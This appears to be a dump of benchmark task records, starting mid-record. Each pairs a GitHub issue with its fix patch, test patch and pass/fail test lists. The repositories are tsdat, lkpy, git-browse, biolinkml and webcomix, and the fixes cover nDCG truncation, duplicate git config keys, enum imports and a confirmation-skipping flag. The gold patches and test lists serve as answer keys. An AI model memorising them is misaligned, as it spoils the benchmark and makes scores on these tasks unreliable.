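# like a reST source, so touching it applies the docs label.
def is_docs_file(filename: str) -> bool:
    filepath = pathlib.PurePath(filename)
    return filepath.suffix == ".rst" or filepath.name == ".nitignore"

assert is_docs_file("Doc/library/os.rst")
assert is_docs_file("Doc/tools/.nitignore")
assert not is_docs_file("Lib/test/test_os.py")
```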
|
0.0
|
b5bcd24e79ad72b47582f89f7e7053f5b3157fa4
|
[
"tests/test_prtype.py::test_docs_no_news_with_dotnitignore"
] |
[
"tests/test_prtype.py::test_no_files",
"tests/test_prtype.py::test_news_only",
"tests/test_prtype.py::test_docs_no_news",
"tests/test_prtype.py::test_docs_and_news",
"tests/test_prtype.py::test_tests_only",
"tests/test_prtype.py::test_docs_and_tests",
"tests/test_prtype.py::test_leave_existing_type_labels",
"tests/test_prtype.py::test_do_not_post_if_nothing_to_apply",
"tests/test_prtype.py::test_news_and_tests",
"tests/test_prtype.py::test_other_files"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-01-19 08:13:31+00:00
|
apache-2.0
| 5,111
|
|
tsdat__tsdat-23
|
diff --git a/tsdat/pipeline/ingest_pipeline.py b/tsdat/pipeline/ingest_pipeline.py
index f5dea5b..ef439d5 100644
--- a/tsdat/pipeline/ingest_pipeline.py
+++ b/tsdat/pipeline/ingest_pipeline.py
@@ -13,7 +13,7 @@ class IngestPipeline(Pipeline):
applying quality checks and quality controls, and by saving the
now-processed data in a standard file format."""
- def run(self, filepath: Union[str, List[str]]) -> None:
+ def run(self, filepath: Union[str, List[str]]) -> xr.Dataset:
"""Runs the IngestPipeline from start to finish.
:param filepath:
@@ -48,6 +48,8 @@ class IngestPipeline(Pipeline):
# Hook to generate custom plots
self.hook_generate_and_persist_plots(dataset)
+ return dataset
+
def hook_customize_dataset(
self, dataset: xr.Dataset, raw_mapping: Dict[str, xr.Dataset]
) -> xr.Dataset:
|
tsdat/tsdat
|
b5e1b0c6c7c94de86175b2b18f6b7fbc2c33cac8
|
diff --git a/tests/test_examples.py b/tests/test_examples.py
index e7c2a58..ff16cd0 100644
--- a/tests/test_examples.py
+++ b/tests/test_examples.py
@@ -67,25 +67,21 @@ def pipeline_produced_expected_directory_tree(pipeline: IngestPipeline) -> bool:
return True
-def pipeline_produced_expected_data(
- pipeline: IngestPipeline, expected_data_file: str
-) -> bool:
- filename = os.path.basename(expected_data_file)
-
- # Retrieve the output data file
- loc_id = pipeline.config.pipeline_definition.location_id
- datastream = DSUtil.get_datastream_name(config=pipeline.config)
- root: str = pipeline.storage._root
- output_file = os.path.join(root, loc_id, datastream, filename)
-
- # Assert that the basename of the processed file and expected file match
- assert os.path.isfile(output_file)
-
- # Compare data and optionally attributes to ensure everything matches.
- ds_out: xr.Dataset = xr.open_dataset(output_file)
- ds_exp: xr.Dataset = xr.open_dataset(expected_data_file)
-
- return ds_out.equals(ds_exp)
+def execute_test(
+ storage_config: str,
+ pipeline_config: str,
+ pipeline: IngestPipeline,
+ input_filepath: str,
+ expected_filepath: str,
+):
+ delete_existing_outputs(storage_config)
+ add_pipeline_module_to_path(storage_config)
+
+ _pipeline = pipeline(pipeline_config, storage_config)
+ ds = _pipeline.run(input_filepath)
+ expected_ds = xr.open_dataset(expected_filepath)
+ xr.testing.assert_allclose(ds, expected_ds)
+ assert pipeline_produced_expected_directory_tree(_pipeline)
def test_a2e_buoy_ingest_example():
@@ -98,23 +94,20 @@ def test_a2e_buoy_ingest_example():
STORAGE_CONFIG,
)
- delete_existing_outputs(STORAGE_CONFIG)
-
- add_pipeline_module_to_path(STORAGE_CONFIG)
-
- humboldt_pipeline = BuoyIngestPipeline(HUMBOLDT_CONFIG, STORAGE_CONFIG)
- morro_pipeline = BuoyIngestPipeline(MORRO_CONFIG, STORAGE_CONFIG)
-
- humboldt_pipeline.run(HUMBOLDT_FILE)
- morro_pipeline.run(MORRO_FILE)
-
- assert pipeline_produced_expected_directory_tree(humboldt_pipeline)
- assert pipeline_produced_expected_directory_tree(morro_pipeline)
-
- assert pipeline_produced_expected_data(
- humboldt_pipeline, EXPECTED_HUMBOLDT_BUOY_FILE
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=HUMBOLDT_CONFIG,
+ pipeline=BuoyIngestPipeline,
+ input_filepath=HUMBOLDT_FILE,
+ expected_filepath=EXPECTED_HUMBOLDT_BUOY_FILE,
+ )
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=MORRO_CONFIG,
+ pipeline=BuoyIngestPipeline,
+ input_filepath=MORRO_FILE,
+ expected_filepath=EXPECTED_MORRO_BUOY_FILE,
)
- assert pipeline_produced_expected_data(morro_pipeline, EXPECTED_MORRO_BUOY_FILE)
def test_a2e_imu_ingest_example():
@@ -127,23 +120,20 @@ def test_a2e_imu_ingest_example():
STORAGE_CONFIG,
)
- delete_existing_outputs(STORAGE_CONFIG)
-
- add_pipeline_module_to_path(STORAGE_CONFIG)
-
- humboldt_pipeline = ImuIngestPipeline(HUMBOLDT_CONFIG, STORAGE_CONFIG)
- morro_pipeline = ImuIngestPipeline(MORRO_CONFIG, STORAGE_CONFIG)
-
- humboldt_pipeline.run(HUMBOLDT_FILE)
- morro_pipeline.run(MORRO_FILE)
-
- assert pipeline_produced_expected_directory_tree(humboldt_pipeline)
- assert pipeline_produced_expected_directory_tree(morro_pipeline)
-
- assert pipeline_produced_expected_data(
- humboldt_pipeline, EXPECTED_HUMBOLDT_IMU_FILE
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=HUMBOLDT_CONFIG,
+ pipeline=ImuIngestPipeline,
+ input_filepath=HUMBOLDT_FILE,
+ expected_filepath=EXPECTED_HUMBOLDT_IMU_FILE,
+ )
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=MORRO_CONFIG,
+ pipeline=ImuIngestPipeline,
+ input_filepath=MORRO_FILE,
+ expected_filepath=EXPECTED_MORRO_IMU_FILE,
)
- assert pipeline_produced_expected_data(morro_pipeline, EXPECTED_MORRO_IMU_FILE)
def test_a2e_lidar_ingest_example():
@@ -156,23 +146,20 @@ def test_a2e_lidar_ingest_example():
STORAGE_CONFIG,
)
- delete_existing_outputs(STORAGE_CONFIG)
-
- add_pipeline_module_to_path(STORAGE_CONFIG)
-
- humboldt_pipeline = LidarIngestPipeline(HUMBOLDT_CONFIG, STORAGE_CONFIG)
- morro_pipeline = LidarIngestPipeline(MORRO_CONFIG, STORAGE_CONFIG)
-
- humboldt_pipeline.run(HUMBOLDT_FILE)
- morro_pipeline.run(MORRO_FILE)
-
- assert pipeline_produced_expected_directory_tree(humboldt_pipeline)
- assert pipeline_produced_expected_directory_tree(morro_pipeline)
-
- assert pipeline_produced_expected_data(
- humboldt_pipeline, EXPECTED_HUMBOLDT_LIDAR_FILE
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=HUMBOLDT_CONFIG,
+ pipeline=LidarIngestPipeline,
+ input_filepath=HUMBOLDT_FILE,
+ expected_filepath=EXPECTED_HUMBOLDT_LIDAR_FILE,
+ )
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=MORRO_CONFIG,
+ pipeline=LidarIngestPipeline,
+ input_filepath=MORRO_FILE,
+ expected_filepath=EXPECTED_MORRO_LIDAR_FILE,
)
- assert pipeline_produced_expected_data(morro_pipeline, EXPECTED_MORRO_LIDAR_FILE)
def test_a2e_waves_ingest_example():
@@ -185,20 +172,17 @@ def test_a2e_waves_ingest_example():
STORAGE_CONFIG,
)
- delete_existing_outputs(STORAGE_CONFIG)
-
- add_pipeline_module_to_path(STORAGE_CONFIG)
-
- humboldt_pipeline = WaveIngestPipeline(HUMBOLDT_CONFIG, STORAGE_CONFIG)
- morro_pipeline = WaveIngestPipeline(MORRO_CONFIG, STORAGE_CONFIG)
-
- humboldt_pipeline.run(HUMBOLDT_FILE)
- morro_pipeline.run(MORRO_FILE)
-
- assert pipeline_produced_expected_directory_tree(humboldt_pipeline)
- assert pipeline_produced_expected_directory_tree(morro_pipeline)
-
- assert pipeline_produced_expected_data(
- humboldt_pipeline, EXPECTED_HUMBOLDT_WAVES_FILE
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=HUMBOLDT_CONFIG,
+ pipeline=WaveIngestPipeline,
+ input_filepath=HUMBOLDT_FILE,
+ expected_filepath=EXPECTED_HUMBOLDT_WAVES_FILE,
+ )
+ execute_test(
+ storage_config=STORAGE_CONFIG,
+ pipeline_config=MORRO_CONFIG,
+ pipeline=WaveIngestPipeline,
+ input_filepath=MORRO_FILE,
+ expected_filepath=EXPECTED_MORRO_WAVES_FILE,
)
- assert pipeline_produced_expected_data(morro_pipeline, EXPECTED_MORRO_WAVES_FILE)
|
`IngestPipeline.run(*)` should return the processed `xarray.Dataset()` object
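A short usage sketch of what this would enable; the config and file paths are placeholders, and in practice a subclass such as `BuoyIngestPipeline` would be used:

```python
import xarray as xr
from tsdat.pipeline.ingest_pipeline import IngestPipeline

# Hypothetical paths; with run() returning the processed dataset, callers and
# tests can assert on it directly instead of re-reading it from storage.
pipeline = IngestPipeline("pipeline_config.yml", "storage_config.yml")
dataset: xr.Dataset = pipeline.run("path/to/input_file.csv")
print(dataset)
```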
|
0.0
|
b5e1b0c6c7c94de86175b2b18f6b7fbc2c33cac8
|
[
"tests/test_examples.py::test_a2e_buoy_ingest_example",
"tests/test_examples.py::test_a2e_imu_ingest_example",
"tests/test_examples.py::test_a2e_lidar_ingest_example",
"tests/test_examples.py::test_a2e_waves_ingest_example"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-11-22 23:29:48+00:00
|
bsd-2-clause
| 6,098
|
|
lenskit__lkpy-312
|
diff --git a/lenskit/metrics/topn.py b/lenskit/metrics/topn.py
index ae1b70f..7f616c5 100644
--- a/lenskit/metrics/topn.py
+++ b/lenskit/metrics/topn.py
@@ -300,11 +300,11 @@ def ndcg(recs, truth, discount=np.log2, k=None):
The maximum list length.
"""
- tpos = truth.index.get_indexer(recs['item'])
-
if k is not None:
recs = recs.iloc[:k]
+ tpos = truth.index.get_indexer(recs['item'])
+
if 'rating' in truth.columns:
i_rates = np.sort(truth.rating.values)[::-1]
if k is not None:
|
lenskit/lkpy
|
0716300a91e55b54e3da150c5fa8355af79fa745
|
diff --git a/tests/test_topn_ndcg.py b/tests/test_topn_ndcg.py
index 5d1601d..2fdf9e5 100644
--- a/tests/test_topn_ndcg.py
+++ b/tests/test_topn_ndcg.py
@@ -87,6 +87,14 @@ def test_ndcg_perfect():
assert ndcg(recs, truth) == approx(1.0)
+def test_ndcg_perfect_k_short():
+ recs = pd.DataFrame({'item': [2, 3, 1]})
+ truth = pd.DataFrame({'item': [1, 2, 3], 'rating': [3.0, 5.0, 4.0]})
+ truth = truth.set_index('item')
+ assert ndcg(recs, truth, k=2) == approx(1.0)
+ assert ndcg(recs[:2], truth, k=2) == approx(1.0)
+
+
def test_ndcg_wrong():
recs = pd.DataFrame({'item': [1, 2]})
truth = pd.DataFrame({'item': [1, 2, 3], 'rating': [3.0, 5.0, 4.0]})
|
nDCG metric does not correctly truncate lists
The nDCG metric has two faults whereby it fails to correctly truncate the truth list and recommendation list under certain conditions:
1. If no k is supplied, the full truth list and recommendation list are used to compute the ideal DCG and recommendation DCG, respectively. If the sizes of the input lists do not match, this causes an incorrect result. See the following example, based on "test_ndcg_wrong" in tests/test_topn_ndcg.py:
```python
truth = pd.DataFrame({'item': [1, 2, 3], 'rating': [3.0, 5.0, 4.0]})
truth = truth.set_index('item')
recs = pd.DataFrame({'item': [1, 2]})
print(ndcg(recs, truth)) # incorrectly gives ~0.7344
print(ndcg(recs, truth, k=2)) # correctly gives ~0.8888
```
2. If a k is supplied that is less than the length of the recommendation list, the recommendation DCG is not computed correctly (due to "tpos" being defined before the recommendation list is truncated). See the following example, based on "test_ndcg_perfect" found in tests/test_topn_ndcg.py:
```python
truth = pd.DataFrame({'item': [1, 2, 3], 'rating': [3.0, 5.0, 4.0]})
truth = truth.set_index('item')
recs = pd.DataFrame({'item': [2, 3, 1]})
print(ndcg(recs, truth)) # correctly gives 1.0
print(ndcg(recs, truth, k=2)) # incorrectly gives ~1.21
print(ndcg(recs[:2], truth, k=2)) # correctly gives 1.0
```
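Both faults come down to when the truncation happens. Here is a standalone sketch of the intended order of operations (an illustration, not the library code): slice the recommendation list to k first, then look the surviving items up in the truth index.

```python
import numpy as np
import pandas as pd

def dcg_at_k(recs: pd.DataFrame, truth: pd.DataFrame, k=None, discount=np.log2):
    # Truncate before indexing so only the top-k recommendations are scored.
    if k is not None:
        recs = recs.iloc[:k]
    tpos = truth.index.get_indexer(recs['item'])
    # Items missing from the truth frame contribute zero gain.
    gains = np.where(tpos >= 0, truth['rating'].values[tpos], 0.0)
    disc = np.maximum(discount(np.arange(1, len(gains) + 1)), 1.0)
    return float(np.sum(gains / disc))
```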
|
0.0
|
0716300a91e55b54e3da150c5fa8355af79fa745
|
[
"tests/test_topn_ndcg.py::test_ndcg_perfect_k_short"
] |
[
"tests/test_topn_ndcg.py::test_dcg_empty",
"tests/test_topn_ndcg.py::test_dcg_zeros",
"tests/test_topn_ndcg.py::test_dcg_single",
"tests/test_topn_ndcg.py::test_dcg_mult",
"tests/test_topn_ndcg.py::test_dcg_empty2",
"tests/test_topn_ndcg.py::test_dcg_zeros2",
"tests/test_topn_ndcg.py::test_dcg_single2",
"tests/test_topn_ndcg.py::test_dcg_nan",
"tests/test_topn_ndcg.py::test_dcg_series",
"tests/test_topn_ndcg.py::test_dcg_mult2",
"tests/test_topn_ndcg.py::test_ndcg_empty",
"tests/test_topn_ndcg.py::test_ndcg_no_match",
"tests/test_topn_ndcg.py::test_ndcg_perfect",
"tests/test_topn_ndcg.py::test_ndcg_wrong",
"tests/test_topn_ndcg.py::test_ndcg_perfect_k",
"tests/test_topn_ndcg.py::test_ndcg_bulk_at_top",
"tests/test_topn_ndcg.py::test_ndcg_bulk_not_at_top",
"tests/test_topn_ndcg.py::test_ndcg_bulk_match[False]",
"tests/test_topn_ndcg.py::test_ndcg_bulk_match[True]"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2022-03-11 19:46:49+00:00
|
mit
| 3,543
|
|
albertyw__git-browse-49
|
diff --git a/git_browse/browse.py b/git_browse/browse.py
index 47ccaeb..451f605 100755
--- a/git_browse/browse.py
+++ b/git_browse/browse.py
@@ -369,7 +369,8 @@ def get_git_config() -> str:
def get_git_url(git_config_file: str) -> str:
- config = configparser.ConfigParser()
+ # strict is removed here because gitconfig allows for multiple "fetch" keys
+ config = configparser.ConfigParser(strict=False)
config.read(git_config_file)
try:
git_url = config['remote "origin"']['url']
|
albertyw/git-browse
|
ee46082dd3dea8fbaa3148d67c26004f5b1f2b6b
|
diff --git a/git_browse/tests/test.py b/git_browse/tests/test.py
index 9578999..cb3ba05 100644
--- a/git_browse/tests/test.py
+++ b/git_browse/tests/test.py
@@ -2,6 +2,7 @@ import os
import re
import shutil
import sys
+import tempfile
from typing import List, cast
import unittest
from unittest.mock import MagicMock, patch
@@ -248,14 +249,22 @@ class GetGitConfig(unittest.TestCase):
class GetGitURL(unittest.TestCase):
def setUp(self) -> None:
- self.git_config_file = os.path.join(
+ git_config_file = os.path.join(
BASE_DIRECTORY,
'.git',
'config'
)
+ with open(git_config_file, 'rb') as handle:
+ configs = handle.read()
+ self.git_config_file = tempfile.NamedTemporaryFile()
+ self.git_config_file.write(configs)
+ self.git_config_file.seek(0)
+
+ def tearDown(self) -> None:
+ self.git_config_file.close()
def test_url(self) -> None:
- git_url = browse.get_git_url(self.git_config_file)
+ git_url = browse.get_git_url(self.git_config_file.name)
expected = 'git@github.com:albertyw/git-browse'
self.assertEqual(git_url.replace('.git', ''), expected)
@@ -263,6 +272,21 @@ class GetGitURL(unittest.TestCase):
with self.assertRaises(RuntimeError):
browse.get_git_url(BASE_DIRECTORY)
+ def test_multiple_fetch(self) -> None:
+ # For https://github.com/albertyw/git-browse/issues/48
+ config_contents = (
+ '[remote "origin"]\n'
+ ' fetch = refs/heads/my_name/*:refs/remotes/origin/my_name/*\n'
+ ' fetch = refs/heads/master:refs/remotes/origin/master\n'
+ ' url = git@github.com:albertyw/git-browse\n'
+ )
+ config_file = tempfile.NamedTemporaryFile()
+ config_file.write(config_contents.encode('utf-8'))
+ config_file.seek(0)
+ git_url = browse.get_git_url(config_file.name)
+ expected = 'git@github.com:albertyw/git-browse'
+ self.assertEqual(git_url.replace('.git', ''), expected)
+
class ParseGitURL(unittest.TestCase):
def setUp(self) -> None:
|
Support running with multiple fetch configs
gitconfig allows multiple fetch configs, which breaks configparser: https://stackoverflow.com/questions/15507264/can-i-specify-in-git-config-to-fetch-multiple-refspecs
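As a standard-library illustration of the point (not code from this repository; the config text mirrors the test added above), a strict ConfigParser rejects the duplicate fetch keys, while strict=False accepts them:
```python
import configparser

config_text = '''\
[remote "origin"]
    fetch = refs/heads/feature/*:refs/remotes/origin/feature/*
    fetch = refs/heads/master:refs/remotes/origin/master
    url = git@github.com:albertyw/git-browse
'''

strict_parser = configparser.ConfigParser()  # strict=True by default
try:
    strict_parser.read_string(config_text)
except configparser.DuplicateOptionError as exc:
    print("strict parser fails:", exc)

lenient_parser = configparser.ConfigParser(strict=False)
lenient_parser.read_string(config_text)          # duplicate "fetch" keys are tolerated
print(lenient_parser['remote "origin"']['url'])  # git@github.com:albertyw/git-browse
```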
|
0.0
|
ee46082dd3dea8fbaa3148d67c26004f5b1f2b6b
|
[
"git_browse/tests/test.py::GetGitURL::test_multiple_fetch"
] |
[
"git_browse/tests/test.py::TestGithubHost::test_commit_hash_url",
"git_browse/tests/test.py::TestGithubHost::test_directory_url",
"git_browse/tests/test.py::TestGithubHost::test_file_url",
"git_browse/tests/test.py::TestGithubHost::test_get_url",
"git_browse/tests/test.py::TestGithubHost::test_init",
"git_browse/tests/test.py::TestGithubHost::test_root_url",
"git_browse/tests/test.py::SourcegraphHost::test_create",
"git_browse/tests/test.py::SourcegraphHost::test_create_dot_git",
"git_browse/tests/test.py::SourcegraphHost::test_get_url_commit",
"git_browse/tests/test.py::SourcegraphHost::test_get_url_directory",
"git_browse/tests/test.py::SourcegraphHost::test_get_url_file",
"git_browse/tests/test.py::SourcegraphHost::test_get_url_root",
"git_browse/tests/test.py::SourcegraphHost::test_init",
"git_browse/tests/test.py::SourcegraphHost::test_valid_focus_object",
"git_browse/tests/test.py::TestGodocsHost::test_create",
"git_browse/tests/test.py::TestGodocsHost::test_create_dot_git",
"git_browse/tests/test.py::TestGodocsHost::test_get_url_commit",
"git_browse/tests/test.py::TestGodocsHost::test_get_url_directory",
"git_browse/tests/test.py::TestGodocsHost::test_get_url_file",
"git_browse/tests/test.py::TestGodocsHost::test_get_url_root",
"git_browse/tests/test.py::TestGodocsHost::test_init",
"git_browse/tests/test.py::TestGodocsHost::test_valid_focus_object",
"git_browse/tests/test.py::GitObject::test_is_directory",
"git_browse/tests/test.py::FocusObject::test_default",
"git_browse/tests/test.py::FocusObject::test_init",
"git_browse/tests/test.py::FocusObject::test_is_directory",
"git_browse/tests/test.py::FocusObject::test_is_not_directory",
"git_browse/tests/test.py::FocusObject::test_is_not_root",
"git_browse/tests/test.py::FocusObject::test_is_root",
"git_browse/tests/test.py::FocusHash::test_init",
"git_browse/tests/test.py::FocusHash::test_is_commit_hash",
"git_browse/tests/test.py::GetRepositoryRoot::test_fail_get",
"git_browse/tests/test.py::GetRepositoryRoot::test_get",
"git_browse/tests/test.py::GetGitConfig::test_get",
"git_browse/tests/test.py::GetGitURL::test_bad_url",
"git_browse/tests/test.py::ParseGitURL::test_broken_url",
"git_browse/tests/test.py::ParseGitURL::test_https_url",
"git_browse/tests/test.py::ParseGitURL::test_sourcegraph_github_host",
"git_browse/tests/test.py::ParseGitURL::test_sourcegraph_uber_host",
"git_browse/tests/test.py::ParseGitURL::test_ssh_url",
"git_browse/tests/test.py::TestGetFocusObject::test_default_focus_object",
"git_browse/tests/test.py::TestGetFocusObject::test_directory_focus_object",
"git_browse/tests/test.py::TestGetFocusObject::test_file_focus_object",
"git_browse/tests/test.py::TestGetFocusObject::test_get_focus_hash",
"git_browse/tests/test.py::TestGetFocusObject::test_invalid_phabricator_object",
"git_browse/tests/test.py::TestGetFocusObject::test_nonexistend_focus_object",
"git_browse/tests/test.py::TestGetFocusObject::test_phabricator_object",
"git_browse/tests/test.py::TestGetCommitHash::test_get_hash",
"git_browse/tests/test.py::TestGetCommitHash::test_get_unknown_hash",
"git_browse/tests/test.py::TestOpenURL::test_dry_open_url",
"git_browse/tests/test.py::TestOpenURL::test_open_subprocess",
"git_browse/tests/test.py::TestOpenURL::test_open_url",
"git_browse/tests/test.py::FullTest::test_check_version"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-10-19 04:46:20+00:00
|
mit
| 1,005
|
|
biolink__biolinkml-369
|
diff --git a/biolinkml/generators/pythongen.py b/biolinkml/generators/pythongen.py
index 63f4a7ca..48c9d2e1 100644
--- a/biolinkml/generators/pythongen.py
+++ b/biolinkml/generators/pythongen.py
@@ -197,12 +197,15 @@ dataclasses._init_fn = dataclasses_init_fn_with_kwargs
add_type_ref(self.schema.types[typ.typeof])
rval.add_element(typ)
+ def add_enum_ref(e: EnumDefinition) -> None:
+ rval.add_element(e)
+
def add_slot_range(slot: SlotDefinition) -> None:
if slot.range:
if slot.range in self.schema.types:
add_type_ref(self.schema.types[slot.range])
elif slot.range in self.schema.enums:
- pass
+ add_enum_ref(self.schema.enums[slot.range])
else:
cls = self.schema.classes[slot.range]
if cls.imported_from:
|
biolink/biolinkml
|
0b62bffabb4938208703acac990a6b2b6461fa7e
|
diff --git a/tests/test_issues/input/issue_368.yaml b/tests/test_issues/input/issue_368.yaml
new file mode 100644
index 00000000..0bc27c5b
--- /dev/null
+++ b/tests/test_issues/input/issue_368.yaml
@@ -0,0 +1,19 @@
+id: https://microbiomedata/schema
+
+prefixes:
+ biolinkml: https://w3id.org/biolink/biolinkml/
+
+imports:
+ - biolinkml:types
+ - issues_368_imports
+
+classes:
+
+ c:
+ is_a: parent_class
+ slots:
+ - s
+
+slots:
+ s:
+ range: e
diff --git a/tests/test_issues/input/issues_368_imports.yaml b/tests/test_issues/input/issues_368_imports.yaml
new file mode 100644
index 00000000..7e576cb0
--- /dev/null
+++ b/tests/test_issues/input/issues_368_imports.yaml
@@ -0,0 +1,10 @@
+id: https://microbiomedata/schema/mixs
+
+classes:
+ parent_class: {}
+
+enums:
+ e:
+ permissible_values:
+ a: A
+ b: B
diff --git a/tests/test_issues/test_issue_368.py b/tests/test_issues/test_issue_368.py
new file mode 100644
index 00000000..fa90edd4
--- /dev/null
+++ b/tests/test_issues/test_issue_368.py
@@ -0,0 +1,57 @@
+import os
+import unittest
+
+from jsonasobj import as_json
+
+from biolinkml.generators.pythongen import PythonGenerator
+from tests.test_issues.environment import env
+from tests.utils.python_comparator import compare_python, compile_python
+from tests.utils.test_environment import TestEnvironmentTestCase
+
+
+class Issue368TestCase(TestEnvironmentTestCase):
+ env = env
+
+ def header(self, txt: str) -> str:
+ return '\n' + ("=" * 20) + f" {txt} " + ("=" * 20)
+
+ def test_issue_368(self):
+ """ Make sure that types are generated as part of the output """
+ env.generate_single_file('issues_368_imports.py',
+ lambda: PythonGenerator(env.input_path('issues_368_imports.yaml'),
+ mergeimports=False).serialize(),
+ comparator=lambda exp, act: compare_python(exp, act, self.env.expected_path('issues_368_imports.py')),
+ value_is_returned=True)
+ env.generate_single_file('issue_368.py',
+ lambda: PythonGenerator(env.input_path('issue_368.yaml'),
+ mergeimports=False).serialize(),
+ comparator=lambda exp, act: compare_python(exp, act, self.env.expected_path('issue_368.py')),
+ value_is_returned=True)
+ with open(env.expected_path('issue_368.py')) as f:
+ python= f.read()
+
+ has_imports = False
+ for line in python.split("\n"):
+ if line.startswith("from . issues_368_imports"):
+ imps = line.replace("from . issues_368_imports import ","").split(", ")
+ assert 'E' in imps
+ assert 'ParentClass' in imps
+ has_imports = True
+ assert has_imports
+ module = compile_python(env.expected_path('issue_368.py'))
+
+ enum_inst = module.E("a") # EnumInstanceImpl
+ example = module.C(s="a")
+ assert hasattr(example, "s")
+ assert example.s.code.text == enum_inst.code.text
+ assert str(example.s) == "a: A"
+ def output_generator(dirname) -> None:
+ with open(os.path.join(dirname, 'issue_368_1.json'), 'w') as f:
+ f.write(as_json(example))
+
+ # TODO: fix this
+ # env.generate_directory('issue_368', lambda dirname: output_generator(dirname))
+
+
+if __name__ == '__main__':
+ unittest.main()
|
enums are not imported in generated python code
E.g.
```yaml
id: https://microbiomedata/schema
prefixes:
biolinkml: https://w3id.org/biolink/biolinkml/
imports:
- biolinkml:types
- issues_368_imports
classes:
c:
is_a: parent_class
slots:
- s
slots:
s:
range: e
```
where the imported file is:
```yaml
id: https://microbiomedata/schema/mixs
classes:
parent_class: {}
enums:
e:
permissible_values:
a: A
b: B
```
```bash
$ gen-python --no-mergeimports tests/test_issues/input/issue_368.yaml
```
produces:
```python
...
from . issues_368_imports import ParentClass
...
```
but the generated Python should also import `E`
|
0.0
|
0b62bffabb4938208703acac990a6b2b6461fa7e
|
[
"tests/test_issues/test_issue_368.py::Issue368TestCase::test_issue_368"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-02-16 18:12:42+00:00
|
cc0-1.0
| 1,389
|
|
J-CPelletier__webcomix-7
|
diff --git a/webcomix/main.py b/webcomix/main.py
index 0053bbb..cba546d 100644
--- a/webcomix/main.py
+++ b/webcomix/main.py
@@ -56,7 +56,12 @@ def download(name, cbz):
default=False,
is_flag=True,
help="Outputs the comic as a cbz file")
-def search(name, start_url, cbz):
+@click.option(
+ "-y",
+ default=False,
+ is_flag=True,
+ help="Assumes 'yes' as an answer to all prompts")
+def search(name, start_url, cbz, y):
"""
Downloads a webcomic using a general XPath
"""
@@ -67,8 +72,8 @@ def search(name, start_url, cbz):
comic.comic_image_selector)
print_verification(validation)
click.echo(
- "Verify that the links above are correct before proceeding.")
- if click.confirm("Are you sure you want to proceed?"):
+ "Verify that the links above are correct.")
+ if y or click.confirm("Are you sure you want to proceed?"):
comic.download(name)
if cbz:
comic.make_cbz(name, name)
@@ -100,7 +105,12 @@ def search(name, start_url, cbz):
default=False,
is_flag=True,
help="Outputs the comic as a cbz file")
-def custom(comic_name, start_url, next_page_xpath, image_xpath, cbz):
+@click.option(
+ "-y",
+ default=False,
+ is_flag=True,
+ help="Assumes 'yes' as an answer to all prompts")
+def custom(comic_name, start_url, next_page_xpath, image_xpath, cbz, y):
"""
Downloads a user-defined webcomic
"""
@@ -109,8 +119,8 @@ def custom(comic_name, start_url, next_page_xpath, image_xpath, cbz):
comic.next_page_selector,
comic.comic_image_selector)
print_verification(validation)
- click.echo("Verify that the links above are correct before proceeding.")
- if click.confirm("Are you sure you want to proceed?"):
+ click.echo("Verify that the links above are correct.")
+ if y or click.confirm("Are you sure you want to proceed?"):
comic.download(comic_name)
if cbz:
comic.make_cbz(comic_name, comic_name)
|
J-CPelletier/webcomix
|
25d394314ce26816302e9c878f5cebfb853c16fb
|
diff --git a/webcomix/tests/test_main.py b/webcomix/tests/test_main.py
index ec2c718..c2dcf42 100644
--- a/webcomix/tests/test_main.py
+++ b/webcomix/tests/test_main.py
@@ -100,7 +100,7 @@ def test_custom(monkeypatch):
assert result.exit_code == 0
assert result.output.strip() == "\n".join([
"Verified", "Printed",
- "Verify that the links above are correct before proceeding.",
+ "Verify that the links above are correct.",
"Are you sure you want to proceed? [y/N]: yes", "foo"
])
@@ -119,7 +119,7 @@ def test_custom_make_cbz(monkeypatch):
assert result.exit_code == 0
assert result.output.strip() == "\n".join([
"Verified", "Printed",
- "Verify that the links above are correct before proceeding.",
+ "Verify that the links above are correct.",
"Are you sure you want to proceed? [y/N]: y", "foo", ".cbz created"
])
@@ -139,6 +139,6 @@ def test_search(monkeypatch):
assert result.exit_code == 0
assert result.output.strip() == "\n".join([
"Verified", "Printed",
- "Verify that the links above are correct before proceeding.",
+ "Verify that the links above are correct.",
"Are you sure you want to proceed? [y/N]: y", "foo"
])
|
Custom: Add a -y (yes) option
I'm looking to use this as a replacement for Dosage, since it allows for custom comics. I'd like to run this daily (or every few days) on a number of comics to pull the latest comic. The confirmation prompt on custom comics ("Are you sure?") is a stumbling block to scripting it. Could you add a -y flag to custom for auto-acknowledging?
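A minimal standalone sketch of the requested behaviour (the command name below is hypothetical; the patch above wires the same flag into the existing search and custom commands): a boolean -y flag that short-circuits the confirmation prompt.
```python
import click

@click.command()
@click.option("-y", default=False, is_flag=True,
              help="Assumes 'yes' as an answer to all prompts")
def download_latest(y):
    # Hypothetical scripted-download command.
    if y or click.confirm("Are you sure you want to proceed?"):
        click.echo("downloading...")

if __name__ == "__main__":
    download_latest()  # e.g. `python script.py -y` runs without prompting
```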
|
0.0
|
25d394314ce26816302e9c878f5cebfb853c16fb
|
[
"webcomix/tests/test_main.py::test_custom",
"webcomix/tests/test_main.py::test_custom_make_cbz",
"webcomix/tests/test_main.py::test_search"
] |
[
"webcomix/tests/test_main.py::test_print_verification",
"webcomix/tests/test_main.py::test_comics",
"webcomix/tests/test_main.py::test_good_download",
"webcomix/tests/test_main.py::test_bad_download",
"webcomix/tests/test_main.py::test_good_download_makecbz",
"webcomix/tests/test_main.py::test_bad_download_make_cbz"
] |
{
"failed_lite_validators": [
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
